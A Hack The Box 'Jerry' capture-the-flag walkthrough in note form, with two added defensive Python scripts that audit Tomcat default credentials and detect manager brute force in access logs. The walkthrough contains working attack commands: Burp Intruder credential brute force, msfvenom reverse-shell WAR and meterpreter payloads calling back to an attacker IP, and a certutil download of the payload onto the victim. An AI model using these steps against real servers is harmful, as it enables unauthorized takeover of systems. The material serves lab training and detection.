HTB - 5. Jerry (Default Credentials)
- `nmap -T4 -p- -A 10.10.10.95` shows 8080 open with Apache Tomcat/Coyote JSP engine 1.1 and Tomcat version 7.0.88
- Go to 10.10.10.95 and it shows the Apache Tomcat default page
- Search "tomcat default credentials" and found https://github.com/netbiosX/Default-Credentials/blob/master/Apache-Tomcat-Default-Passwords.mdown
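The list the writeup links to is the same list a defender should check a server against before it is exposed. The following Python script is an added example, not part of this writeup or of Tomcat itself: it reads a tomcat-users.xml (the file where Tomcat's memory realm stores its users) and flags every user whose username:password pair appears in a default-credential list, rating it critical when that user also holds a manager role. The XML and the default pairs below are constructed samples; in practice the pairs would be loaded from the linked list.

```python
"""Audit a Tomcat tomcat-users.xml for default or published credentials.

Added example (not from the writeup). DEFAULT_PAIRS and SAMPLE_TOMCAT_USERS
are constructed for this demo; replace DEFAULT_PAIRS with the pairs from the
Default-Credentials list referenced in the writeup.
"""
import xml.etree.ElementTree as ET

# Constructed sample of (username, password) pairs of the kind found in
# published default-credential lists.
DEFAULT_PAIRS = {
    ("tomcat", "tomcat"),
    ("tomcat", "s3cret"),
    ("admin", "admin"),
    ("admin", ""),
    ("role1", "tomcat"),
}

# Roles that grant access to the manager or host-manager web applications,
# i.e. the ability to deploy arbitrary WAR files.
MANAGER_ROLES = {
    "manager-gui", "manager-script", "manager-jmx", "manager-status", "admin-gui",
}

# Constructed tomcat-users.xml in the layout of the stock Tomcat 7 file.
SAMPLE_TOMCAT_USERS = """<?xml version="1.0" encoding="UTF-8"?>
<tomcat-users xmlns="http://tomcat.apache.org/xml"
              xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
              version="1.0">
  <role rolename="manager-gui"/>
  <role rolename="admin-gui"/>
  <role rolename="manager-script"/>
  <user username="tomcat" password="s3cret" roles="manager-gui,admin-gui"/>
  <user username="deploy" password="Xk9!vq2#Lr8mZp" roles="manager-script"/>
</tomcat-users>
"""


def audit_tomcat_users(xml_text, default_pairs=DEFAULT_PAIRS):
    """Return one finding dict per user whose credentials are in default_pairs."""
    root = ET.fromstring(xml_text)
    findings = []
    # The stock file declares a default namespace, so compare local tag names only.
    for elem in root.iter():
        if elem.tag.split("}")[-1] != "user":
            continue
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        if (name, password) not in default_pairs:
            continue
        manager = bool(roles & MANAGER_ROLES)
        findings.append({
            "username": name,
            "roles": sorted(roles),
            "manager_access": manager,
            # A default password on a manager-capable account is remote code execution.
            "severity": "critical" if manager else "high",
        })
    return findings


if __name__ == "__main__":
    for f in audit_tomcat_users(SAMPLE_TOMCAT_USERS):
        print(f"{f['severity'].upper()}: user {f['username']!r} uses a listed "
              f"default password (roles: {', '.join(f['roles']) or 'none'})")
```

Run it against a copy of the server's conf/tomcat-users.xml; the deploy user with a non-listed password produces no finding, while the tomcat:s3cret account with manager-gui is reported as critical.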
- Burp Suite
  - Click the server management page
  - Try logging in with tomcat:tomcat
  - Send the request to Decoder
  - Select the Authorization: Basic value and decode it as base64
  - Forwarded the request; the login did not work
  - Try again and send the request to Repeater and Intruder
- Create passwords
  - Get the list from the URL above and replace " " with ":" so each line is user:password
  - Write a bash script to base64-encode all the credentials:

    ```bash
    # Read one user:password pair per line from tomcat.txt and print its base64
    # encoding, the form used in an HTTP Basic Authorization header.
    # echo -n keeps the trailing newline out of the encoded value.
    for cred in $(cat tomcat.txt); do echo -n "$cred" | base64; done
    ```
- Back to Burp Suite Intruder
  - Set the attack type to Sniper
  - Select the Authorization: Basic value as the payload position
  - Paste the list of base64-encoded username:password pairs into Payloads / Payload Options
  - Disable URL encoding of the payload (otherwise the "=" padding in the base64 gets encoded)
  - Run it and look for the response with a much longer length and status code 200; that is the successful credential pair:
    tomcat:s3cret
- Create WAR file exploit
  - Search "tomcat war reverse shell msfvenom": https://netsec.ws/?p=331

    ```bash
    # Build a WAR whose JSP will try to connect back to our machine on port 4444
    msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.24 LPORT=4444 -f war > shell.war
    # Listen on port 4444 for the connection
    nc -nvlp 4444
    ```
  - Upload the WAR to the Tomcat management server and deploy it
  - Go to /shell and got a shell as nt authority\system

    ```
    whoami
    cd c:\users\administrator
    cd Desktop
    cd flags
    dir
    arp -a
    ```
  - Search for a new reverse shell
- New reverse shell
  - Create payload:

    ```bash
    msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.24 LPORT=5555 -f exe > sh.exe
    ```
  - Listen on port 5555:

    ```
    sudo msfconsole
    use exploit/multi/handler
    set payload windows/x64/meterpreter/reverse_tcp
    options
    set LHOST 10.10.14.24
    set LPORT 5555
    run
    ```
  - Transfer the file to Windows:

    ```
    python -m SimpleHTTPServer 80    <-- start a web server on the attacker machine
    certutil -urlcache -f http://10.10.14.24/sh.exe c:\users\administrator\desktop\flags\sh.exe    <-- on the victim
    dir sh.exe
    ```
  - Result: shell popped
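Both the Intruder run (a burst of 401 responses on /manager from one client, followed by a 200) and the WAR deployment through the manager (a POST to its upload endpoint) leave an unmistakable trace in Tomcat's access log. The Python script below is an added example and not part of this writeup: it parses lines in Tomcat's AccessLogValve "common" pattern (`%h %l %u %t "%r" %s %b`), counts failed manager logins per client address, and flags a client whose success follows a burst of failures as well as any deploy via the manager's upload or deploy paths. The log lines are constructed for the example; the threshold of five failures is an assumed tuning value.

```python
"""Detect manager brute force and WAR deployment in Tomcat access logs.

Added example (not from the writeup). SAMPLE_LOG is constructed; the
FAILED_AUTH_THRESHOLD value is an assumed tuning knob.
"""
import re
from collections import defaultdict

# Tomcat AccessLogValve "common" pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<bytes>\S+)$'
)

FAILED_AUTH_THRESHOLD = 5  # assumed: 401s on /manager from one client before alerting

# Constructed sample: one client hammers the manager, then logs in and uploads a WAR;
# a second client uses the manager normally and a third only browses the default page.
SAMPLE_LOG = """\
10.10.14.24 - - [21/Jun/2018:10:15:01 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [21/Jun/2018:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [21/Jun/2018:10:15:02 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [21/Jun/2018:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [21/Jun/2018:10:15:03 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - - [21/Jun/2018:10:15:04 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.10.14.24 - tomcat [21/Jun/2018:10:15:09 +0000] "GET /manager/html HTTP/1.1" 200 11341
10.10.14.24 - tomcat [21/Jun/2018:10:16:30 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=EXAMPLE HTTP/1.1" 302 -
192.168.1.5 - admin [21/Jun/2018:10:17:00 +0000] "GET /manager/html HTTP/1.1" 200 11341
192.168.1.9 - - [21/Jun/2018:10:17:05 +0000] "GET / HTTP/1.1" 200 11217
"""


def parse_line(line):
    """Parse one common-format access log line into a dict, or None if it does not match."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def detect_manager_abuse(lines, threshold=FAILED_AUTH_THRESHOLD):
    """Return {client_ip: stats} for clients that brute-forced /manager or deployed through it."""
    stats = defaultdict(lambda: {
        "failed_auth": 0,
        "success_after_failures": False,
        "success_user": None,
        "manager_uploads": 0,
    })
    for line in lines:
        rec = parse_line(line)
        if rec is None or not rec["path"].startswith("/manager"):
            continue
        s = stats[rec["host"]]
        if rec["status"] == 401:
            # Basic-auth challenge not satisfied: one failed credential attempt.
            s["failed_auth"] += 1
            continue
        if s["failed_auth"] >= threshold and not s["success_after_failures"]:
            # First non-401 after a burst of failures: the guess succeeded.
            s["success_after_failures"] = True
            s["success_user"] = rec["user"]
        if rec["method"] in ("POST", "PUT") and (
            "/upload" in rec["path"] or "/deploy" in rec["path"]
        ):
            # Manager HTML upload form or text-interface deploy: a new WAR was installed.
            s["manager_uploads"] += 1
    return {
        ip: s for ip, s in stats.items()
        if s["failed_auth"] >= threshold or s["manager_uploads"]
    }


if __name__ == "__main__":
    for ip, s in detect_manager_abuse(SAMPLE_LOG.splitlines()).items():
        print(f"{ip}: {s['failed_auth']} failed manager logins, "
              f"success after burst={s['success_after_failures']} "
              f"(user {s['success_user']}), WAR uploads={s['manager_uploads']}")
```

Point the script at localhost_access_log.*.txt under Tomcat's logs directory (the default AccessLogValve output); the 192.168.1.5 admin session above is not reported because it had no failures and deployed nothing.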